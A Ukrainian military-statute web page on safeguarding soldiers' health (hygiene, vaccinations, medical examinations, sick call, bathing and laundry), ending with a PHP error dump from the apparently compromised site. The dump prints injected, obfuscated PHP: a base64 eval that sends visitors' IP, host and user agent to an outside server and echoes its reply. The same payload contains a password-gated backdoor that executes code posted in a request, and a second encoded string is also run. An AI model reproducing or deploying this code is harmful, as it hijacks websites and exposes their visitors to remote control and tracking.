Збереження і зміцнення здоров’я військовослужбовців.

Український легіон » Дисципліни » Статут ЗСУ » Збереження і зміцнення здоров’я військовослужбовців.

 Збереження і зміцнення здоров'я, фізичний роз­виток військовослужбовців — важлива і невід'ємна скла­дова їх підготовки до виконання військового обов'язку. Піклування командира (начальника) про здоров'я під­леглих є одним з основних його обов'язків у діяльності щодо забезпечення постійної бойової готовності війсь­кової частини (підрозділу).                      .   ;

 Збереження і зміцнення здоров'я військовослуж­бовців досягається шляхом:

• проведення командирами (начальниками) заходів, спрямованих на створення здорових умов служби і побуту;                                                  

• систематичного загартовування і фізичного роз­витку;

• виконання санітарно-гігієнічних, протиепідемічних і лікувально-профілактичних заходів.

1. Створення здорових умов служби і побуту військовослужбовців.

Повсякденна діяльність військовослужбовців у будь-якій обстановці має здійснюватися з додержан­ням вимог військових статутів і порадників щодо ство­рення здорових умов їх служби і побуту. При цьому використовується специфіка завдань, що виконуються, кліматичні умови, екологічна обстановка в районі дис­локації військової частини, стан матеріального забез­печення і казармено-житлового фонду.

Основними напрямами діяльності командирів (начальників) щодо створення здорових умов служби і побуту військовослужбовців є:

встановлення і своєчасне доведення до військово­службовців необхідних вимог безпеки, забезпечення їх виконання;

суворе виконання санітарних норм і вимог військо­вих статутів щодо розміщення військовослужбовців, організації їх харчування, водопостачання та інших ви­дів матеріального і побутового забезпечення;

організація точного виконання розпорядку дня;

своєчасне і повне доведення до кожного військово­службовця встановлених норм забезпечення;

усунення або зниження до встановлених меж впливу шкідливих факторів на здоров'я військовослужбовців, вжиття заходів щодо поліпшення екологічної обстановки в районі розташування військової частини (підрозділу).


 2.   Загартування і фізичний розвиток військовослужбовців.

 Загартування військовослужбовців проводиться з метою підвищення стійкості їх організму до змін фі­зичних факторів довкілля, до умов, пов'язаних з особли­востями військової служби і виконанням бойових зав­дань.

Заходи щодо загартування військовослужбовців проводяться їх командирами (начальниками) під систе­матичним контролем начальника медичної служби. Під час планування цих заходів враховуються стан здоров'я військовослужбовців, їх вік та кліматичні умови місце­вості.

Загартування військовослужбовців, мав проводитися безперервно шляхом  комплексного використання водних , сонячних та повітряних процедур у поєднанні  із заняттями з фізичної підготовки і спорту.

Основними способами загартування військовослужбовців є:
щоденне виконання фізичних вправ на відкритому повітрі;
обмивання до пояса холодною водою, а також миття ніг холодною водою перед сном;

Проведення у зимовий період лижних тренувань і занять;

Проведення у літній період занять і спортивно-масових заходів у полегшеному одязі; прийняття сонячних ванн, купання у відкритих водоймах у вільний від занять і робіт час та у вихідні дні, а для військовослужбовців  строкової служби - тільки під час організовуваного купання, навчальних занять  і змагань з плавання.

Виконання фізичних прав проводиться під час ранкової фізичної зарядки, навчально-бойової діяльності військовослужбовців, а також підчас самостійних тренувань.

На заняттях виконуються фізичні вправи з використанням різних  способів тренування і дозування фізичного  навантаження з урахування належності військовослужбовців до видів Збройних Сил і родів військ, віку і стану здоров’я.

Заняття спортом проводяться в спортивних секціях і командах у години, встановлені  розпорядком дня.

 

Санітарно-гігієнічні і протиепідемічні заходи

 Кожний військовослужбовець повинен піклуватися про збереження свого здоров’я, не приховувати хвороб, суворо додержуватися правил особистої, громадської гігієни та утримуватися від шкідливих звичок (куріння і вживання алкоголю).

Кожний командир (начальник) зобов’язаний забезпечити у підпорядкованій йому частині  (підрозділі)особистої і громадської гігієни) додержання військовослужбовцями правил особистої і громадської гігієни.

Додержання правил особистої гігієни включає:

ранкове і вечірнє вмивання з чищенням зубів;

миття рук   перед прийманням Їжі;

своєчасне гоління, підстригання волосся та обрізання нігтів;

щотижневе миття в лазні зі зміною натільної і постільної білизни, онуч і шкарпеток;

утримання і чистоті обмундирування, взуття й постелі, своєчасну заміну підкомірців.

Зачіска військовослужбовця а також вуса, борода, якщо вони є, мають

відповідати вимогам гігієни і не заважати використанню засобів індивідуального захисту  та носінню спорядження. Носіння бороди дозволяється тільки офіцерам і прапорщикам (мічманам) за наявності медичних показань.

Правила громадської гігієни включають  підтримання чистоти в спальних приміщеннях, туалетах та інших кімнатах загального користування, регулярне провітрювання приміщень, підтримання чистоти у місцях  загального користування, а також на території розташування військової частини.

Усім військовослужбовцям проводяться запобіжні щеплення проти основних інфекційних хвороб. Щеплення можуть бути плановими і проводитися за епідемічними показаннями.

Планові запобіжні щеплення всьому особовому складові військової частини проводяться відповідно до календаря щеплень, а щеплення за епідемічними показаннями - за наказом старшого командира (начальника).

Від проведення щеплень військовослужбовці звільняються тільки за висновком лікаря.

Відмітки про щеплення заносяться у військові квитки і засвідчуються печаткою військової частини, а до медичних книжок додатково заносяться відмітки про звільнення від щеплень.

Військовослужбовець зобов’язаний доповісти за командою про випадки виникнення інфекційних захворювань в осіб, які проживають з ним в одній квартирі (кімнаті гуртожитку) і допускаються до виконання службових обов’язків з дозволу командира військової частини за висновком та рекомендаціями  начальника медичної служби.

У разі виявлення у військовій частині інфекційного хворого начальник медичної служби негайно доповідає про це командирові частини і старшому медичному начальникові, забезпечує ізоляцію і госпіталізацію хворих, проведення дезинфекції у підрозділах, спостереження за особами, які були у контакті з хворими, і посилення санітарно-гігієнічного контролю.

У разі потреби рішенням старшого начальника у військовій частині запроваджується режим обсервації або карантин, забороняється або обмежується контакт  з цивільним населенням, проведення зборів особового складу і масових заходів, облаштовуються додаткові ізолятори.

  

Лікувально-профілактичні заходи

Основними лікувально-профілактичними заходами є диспансеризація, амбулаторне, стаціонарне і санаторно-курортне лікування військовослужбовців.

З метою запобігання поширенню інфекційних захворювань лікувально-профілактичні заходи, які пропонуються медичною службою, обов’язкові для виконання всіма військовослужбовцями.

Диспансеризація включає медичний контроль за станом здоров’я особового складу, активне завчасне виявлення захворювань, вивчення умов служби і побуту військовослужбовців,  виявлення факторів, які негативно впливають на їх здоров’я, проведення профілактичних і лікувально-оздоровчих заходів.

Медичний контроль за станом здоров’я військовослужбовців здійснюється шляхом проведення:

щоденного медичного спостереження за ними у процесі бойової підготовки і в побуті;

медичних оглядів;

поглиблених і контрольних медичних обстежень.

медичному оглядові підлягають:

весь особовий склад полку - перед проведенням профілактичних щеплень;

рядовий, сержантський і старшинський склад -

у лазні перед  миттям;

особовий склад чергових сил (змін) - перед заступанням на бойове чергування (бойову службу);

військовослужбовці, робота яких пов’язана з можливим впливом несприятливих факторів, а також особи, які перебувають під диспансерним динамічним наглядом, - в установлені для них терміни;

особи, які постійно працюють у їдальнях, на продовольчих складах, об’єктах водопостачання, у пекарнях, лазнях, пральнях, і санітари один раз на тиждень;

особовий склад добового наряду, який призначається у наряд по їдальні та виконує обов’язки зі стрілецькою зброєю;

Усі військовослужбовці строкової служби, новоприбулі, а також ті, що повернулися з  відпустки, відряджень і лікувальних закладів після одужання, - в день прибуття до військової частини після доповіді про це безпосередньому командирові (начальникові);

водії – перед виїздом у рейс;

 учасники спортивних змагань – перед змаганнями;

заарештовані у дисциплінарному порядку –перед  відправленням на гауптвахту, а також після повернення до підрозділу.

Поглиблені медичні обстеження здійснюються з метою оцінки фізичного розвитку, стану здоров і проводиться;

нового поповнення – протягом двох тижнів після прибуття до військової частини;

військовослужбовців   строкової служби – двічі на рік перед початком зимового і літнього періодів навчання;

  офіцерів, прапорщиків та військовослужбовців, які проходять військову службу за контрактом, - раз на рік.

До проведення медичного обстеження військовослужбовців залучються лікарі-спеціалісти із військово-лікувальних закладів.

Час, порядок і місце  проведення медичного обстеження та огляду особового складу підрозділів  військової частини оголошуються в наказі по частині. Забороняється  призначати медичні осьеження та огляди підрозділів у дні відпочинку.

Роту на медичне обстеження представляє командир роти, на медичний огляд – старшина роти. На медичних обстеженнях особового складу роти  зобовзані бути  присутніми всі офіцери і прапорщики роти. Вони повинні повідомляти лікарю про свої спостереження за станом здоров‘я підлеглих. Записи про результати медичних обстежень та оглядів особового складу роти  лікар заносить до медичних книжок. Військовослужбовці, які за станом здоров  потребують диспансерного нагляду, беруться на облік і періодично підягають контрольним медичним обстеженням.

Військовослужбовці,які з поважних причин не пройшли медичного обстеження, направляються за наказом командира роти до медичного пункту військової частини (поліклініки, поліклінічного відділення військового госпіталю) при першій можливості.

Про результати мединого обстеження особового складу військової частини, а також пропозиції щодо проведення необхідних лікувально-оздоровчих заходів начальник мединої служби частини доповідає командирові частини.

Військовослужбовці зобов‘язані негайно повідомити про захворювання безпосередньому начальникові, який зобов‘язаний направити хворого  до медичного пункту частини.

Амбулаторний рийом проводиться в медичному пункті  військвової частини лікарем (фельдшером) у години, втановлені розпорядком для  військової чатини.

Військовослужбовці, які захворіли раптово або дістали травму, направлються до медичного пункту чатини негайно, у будь-який час доби.

Військовослужбовці рядового, сержанстського і старшинського складу направляються до медичного пункту  частини черговим ротьи під командою санітарного інструктора роти або старшого, призначеного з числа хворих. Книга заапису хвори (згідно з додатком 14 до цього Статуту) за підписом  старшини роти подається черговому медичного пункту не пізніше ніж за 2 години до початку амбулаторного прийому. Черговий фельдшер контроює прибуття до медичного пункту всіх військовослужбовців, занесених до книги запису хворих.

Після огляду лікарем (фельдшером) хворі залежно від характеру хвороби направляються  для лікування .

Хворі , яким призначене амбулаторне лікування, для приймання ліків  і провдедення інших лікувальних процедур, а також ті, що потребують консультації медичних спеціалістів, направляються до медичного пунту військової частини у дні і години, зазначені лікарем у книзі запису хворих.

Після одержання медичної допомоги ввійськовослужбовці повертаються в розташування роти під командуванням санітарного інтруктора або старшого. Старший команди передає книгу запису хворих черговому роти, який подає її командирові роти. За висновком лікаря (фельдшера), зазначеним у книзі запису хвориах, і відповідним рішенням командира роти старшина роти віддає необхідні вказівки.

Офіцери, прапорщики та військовослужбовці, які проходять службу за контрактом, за висновком лікаря можуть залишатися для лікування на квартирах (удома). Про результати огляду хворих, характер поданої допомаги і призначення лікар робить відповідні відмітки  в медичних книжках.

Висновок про часткове або повне звільнення військовослужбовців строкової служби від занять, робіт, несення служби у наряді, а  офіцерів, праорщиків та військовослужбовців, що  проходять службу за контрактом, - від  виконання службових обовёязків дається лікарем, а у військових частинах,  де лікар за  штатом не передюачений, - фельдшером не більше ніж на шість діб. У разі потреби  термін звільнення може бути продовжено. Рекомендації лікаря (фельдеша) про часткове або повне звільнення від виконання обовзків підлягають виконанню посадовими особами.

По закінченні терміну звідьнення за висновком лікаря військовослужбовці мають бути направлені у разі потреби на повторний медичний огляд. Про звільнення від виконання службових обовзків офіцерів, прапорщиків і військовослужбовців, які   проходять військову службу за контактом, на підставі іх рапорту і про вихід їх на службу після хвороби оголошується в наказі  по військовій частині.

Зарахування військовослужбовців  строкової служби на дієтичне харчування  здійснюється наказом по військовій частині на термін до трьох міісяців на основі висноку начальника медичної служби військової частини.

У медичному пункті військовї частини проводиться 14-денне стаціонарне лікування хворих, а також військовослужбовців, нааправлених з лікувальних закладів (частин) на лікування та реабілітацію.

На стаціонарне лікування поза розташуванням військової  частини Військовослужбовці направляються за  висноком лікаря війської частини, а для подання невідкадної допомоги за відстутності лікаря – черговим фельдшером (санітарним інструктором) медичного пункту з одночастним доповіданням дпро це начальникові  медичної служби і черговому військовї частини. До лікувальних закладів хворі доставляються у супроводі фельдшера (санітарного інструктора).

У разі направлення  на лікування поза розташуванням  частини військовослужбовці повинні бути одягнені відповідно до пори року і мати при собі направлення, підписане командиром військовї частини, медичну книжку, документ, який посвідчує особу, необхідні особисті речі та атестат на продовольство, за необхідності – довідку про травму і медичну характеристику, а у разі вибуття  на лікування за межі гаргізону, крім того, - атестат на речове і грошове забезпечення, проїздні документи до місця розташування лікувального закладу і назад.

Про всіх військовослужбовців, яких направлено на стаціонарне лікування  поза частиною, начальник (командир) лікувального закладу (частини) зобов‘язаний у той же день повідомити командирові частини, з якої ці військовослужбовці  прибули. Про хворих з отруєнням чи травмами начальник (командир) лікувального закладу (частини) зобов‘язаний негайно доповісти  командирові  військової частини, з якої прибув хворий (хворі), а з інфекційними захворюваннями, крім  того, - у найближчий  санітарно-епідеміологічний заклад.

Військовослужбовці які захворіли в період відпустки або у відрядженні, на стаціонарне лікування направляються військовими комендантами або військовими комісарами.

Начальник (командир)  лікувального закладу (частини) зобовзаний за 5 днів до вписки військовослужбовців повідомити про це командирові військової частини, з якої вони прибули. У день виписки військовослужбовцеві лікувальним закладом (частиною) видаються відповідні документи, і він самостійно (якщо не прибув супровідник з частини) направляється у військову частину,  з якої  прибув; після повернення до ввійськової частини і доповіді безпосередньому командирові (начальникові) військовослужбовці направляються до медичного пункту чатини, де здають медичні  документи; інші документи даються старшині роти.

 

Банно-пральне обслуговування 

Військовослужбовці повинні митися у лазні не рідше одного разу на тиждень,  а кухарі і пекарі, крім того, щоденно приймити душ. Механіки-водії (водії), інші військовослужбовці, робота яких пов‘язана з експлуатацією та обслуговуванням озброєння, бойової та іншої техніки, приймають луш у разі потреби.

Під час миття у лазні  (приймання лушу) військовослужбовці строкової служби забезпечуються милом, рушниками та  продезінфікованими мочалками. Час миття підрозділів у лазні встановлюється заздалегідь.

Рота направляється до лазні під командою старшини роти. Військовослужбовці, які перебувають у наряді або відсутні з якихось інших причин, а також ті, що повернулися в відряджень і відпусток, направляються до лазні за налказом старшини роти в інший час під командуванням старшого з числа сержантів.

Заарештовані особи, взяті під варту, направляються до лазні окремо, у спеціально відведений для них час.

Для нагляду за додержанням  порядку у лазні призначається черговий лазні із сержантів, а для проведення медичного огляду  і подання медичної допомоги на час миття особового складу – черговий фельдшер (санітарний інструктор).

Для прибирання приміщень лазні та їх дезінфекції після кожної зміни у розпорядження чергового лазні призначається необхідна кількість рядових.

Прання білизни проводиться у пральнях. Порядок прання встановлюється заступником командира військовї частини з тилу. Якщо в пральнях немає можливості для прання бавовняного обмундирування, військовослужбовцям строкової служби дозволяється прати його у відведених старшиною роти обладнаних для цього місцях.

Натільна та постільна білизна, рушники, онучі й шкарпетки підлягають зміні раз на тиждень – у  дні миття у лазні; кухарям  і пекарям натільна білизна видається не рідше ніж двічі на тиждень. Чиста натільна білизна, рушники, онучі і шкарпетки видаються,  а брудна білизна здається безпосередньо в лазні.

У разі потреби зміна білизни, рушників, онуч і шкарпеток проводиться частіше.

Спеціальне оброблення обмундирування, натільної і постільної білизни проводиться за окремим розпорядженням командира військовї частини.

Останні статті

Отримання дозволу на зброю
03.04.2015

Отримання дозволу на зброю

Перелік документів на придбання нарізної та гладкоствольної зброї
Детальніше
Гарнізонні заходи за участю військ.
28.05.2014

Гарнізонні заходи за участю військ.

Детальніше
MODx Content Manager »

« MODx Parse Error »

MODx encountered the following error while attempting to parse the requested resource:
« PHP Parse Error »
 
PHP error debug
  Error: assert(): Assertion "eval(base64_decode("aWYgKCFpc3NldCgkaWJ2KSkgeyAgQGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIixmYWxzZSk7QGVycm9yX3JlcG9ydGluZygwKTsKaWYoIWVtcHR5KCRfQ09PS0lFWyJjbGllbnRfY2hlY2siXSkgJiYgZW1wdHkoJGlidikpIHsgJGlidiA9ICRfQ09PS0lFWyJjbGllbnRfY2hlY2siXTsgIGVjaG8gJGlidjt9IGVsc2VpZiAoZW1wdHkoJGlidikpIHsKaWYgKHN0cnN0cigkX1NFUlZFUlsiSFRUUF9IT1NUIl0sICIxMjcuMCIpKXskbmFtZSA9ICRfU0VSVkVSWyJTRVJWRVJfQUREUiJdO31lbHNleyRuYW1lID0gJF9TRVJWRVJbIkhUVFBfSE9TVCJdO30KJHVzZXJhID0gaXNzZXQoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKT91cmxlbmNvZGUoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKToiIjsKJHVybCA9ICJodHRwOi8vbGV0c2dvdG90b3AuY29tL2dldC5waHA/aXA9Ii51cmxlbmNvZGUoJF9TRVJWRVJbIlJFTU9URV9BRERSIl0pLiImZD0iLnVybGVuY29kZSgkbmFtZS4kX1NFUlZFUlsiUkVRVUVTVF9VUkkiXSkuIiZ1PSIuJHVzZXJhLiImaT0xJmg9Ii5tZDUoIjRmNGQzYjhlNzBmYzNkODJhN2VjN2VhNWU2ODk1Y2FhMTEiKTsKaWYoZnVuY3Rpb25fZXhpc3RzKCJjdXJsX2luaXQiKSkgewokY2ggPSBjdXJsX2luaXQoJHVybCk7CmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9IRUFERVIsIEZBTFNFKTtjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfQ09OTkVDVFRJTUVPVVQsIDUpOyBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVElNRU9VVCwgNSk7CmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgVFJVRSk7CiRpYnYgPSBjdXJsX2V4ZWMoJGNoKTskaW5mbyA9IGN1cmxfZ2V0aW5mbygkY2gpO2lmICgkaW5mb1siaHR0cF9jb2RlIl0hPTIwMCl7JGlidj0iIjt9CmN1cmxfY2xvc2UoJGNoKTsKfSBlbHNlaWYoaW5pX2dldCgiYWxsb3dfdXJsX2ZvcGVuIikgPT0gMSkgewokaWJ2ID0gZmlsZV9nZXRfY29udGVudHMoJHVybCk7Cn0KaWYoIWVtcHR5KCRfUE9TVFsicCJdKSAmJiBtZDUobWQ1KCRfUE9TVFsicCJdKSkgPT0gIjNmMTFlNmE0MmJjMWQ4MDE2MDUwMzEyYzc4OWRkNzFmIikgeyBAZXZhbChzdHJpcHNsYXNoZXMoJF9QT1NUWyJjIl0pKTsgfQplY2hvICRpYnY7Cn0gfQ=="));" failed 
  Error type/ Nr.: Warning - 2 
  File: /sata2/home/users/ukrlegion/www/www.ukrlegion.com/index.php 
  Line: 139 
  Line 139 source: $light = $strings2($gbz.'("nJLtXPScp3AyqPtxnJW2XFxtrlNtDTyhnI9mMKDbVzEcp3OfLKysMKWlo3WmVvkzLJkmMFx7DTIlpz9lK3WypT9lqTyhMltjXGfXnJLbVJIgpUE5XPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKFxtWvLtMJ1jqUxbWTyvqvxcVUftWTyvqvN9VPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKGftVTIwnT8tWTyvqwg9VTIfp2IcMvNbMJ1jqUxbWTyvqvxcVUfXnJLtXUA0paA0pvtxK1ASHyMSHyfvFSEHHS9VG1AHVy0fVPVkZwphZPVcXKfxozSgMFN9VPEsH0IFIxIFJlWGEIWJEIWsDHERHvWqB31yoUAyrlEhLJ1yVQ0tWS9GEIWJEIWoVxuHISOsFR9GIPWqB30XWUImMKWuVQ0tnKAmMKDbWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqXG91pzkyozAiMTHbWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqXGbvVwfXWUIloPN9VPWbqUEjBv8ioTI0p2qiqT90o3NhL29gY2qyqP5jnUN/nKN9Vv51pzkyozAiMTHbWS9GEIWJEIWoVyWSGH9HEI9OEREFVy0cYvVzMQ0vYaIloTIhL29xMFtxozSgMF4xK1ASHyMSHyfvHxIEIHIGIS9IHxxvKFxhVvM1CFVhWUImMKWuYvVznG0kWzt9Vv5gMQHbVwEzATDmLwuyAmOzLmAxBQWuA2IwA2IuAJH2BQx1L2SuZGRvXGfXnJLbMaIhL3Eco25sMKucp3EmXPWwqKWfK2yhnKDvXFxtrjbxL2ttCFOwqKWfK2yhnKDbWUIloPx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9VEHSREIVfVRMOGSASXGgwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsD09BGxIQISEWGHICIIDfVQHcBlOwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsIRyAEH9IIPjtAFx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9FEIEIHx5HHxSBH0MSHvjtISWIEFx7PvEcLaLtCFOwqKWfK2I4MJZbWTAbXGfxnJ5zolN9VTA1pzksM2I0nJ5zoltxL2tcB2yzVPtxnJ5zo1fvnUE0pS9wo2EyVy0uCGVjZPy7WTyvqw0vVwg9PzA1pzksL2kip2HbWTAbXGfXsFOyoUAynJLbnJ5cK2qyqPtvLJkfo3qsqKWfK2MipTIhVvxtCG0tZFxtrjbxnJW2VQ0tMzyfMI9aMKEsL29hqTIhqUZbWUIloPx7Pa0XnJLbVJIgpUE5XPEsHR9GISfvpPWqXFNzWvOgMQHboJD1XPEsHR9GISfvpPWqXFxtCG0tVwAzZGSyAzR0ZzWwZJD4ZQR2ZQHjZmRlLmp4BJExAmSzVvxtrlONMKMuoPumqUWcpUAfLKAbMKZbWS9DG1AHJlWwVy0cXGftsDcyL2uiVPEcLaL7Pa0tsD=="));'); $strings($light); ?> 
 
Parser timing
  MySQL: 0,0096 s(22 Requests)
  PHP: 0,2576 s 
  Total: 0,2672 s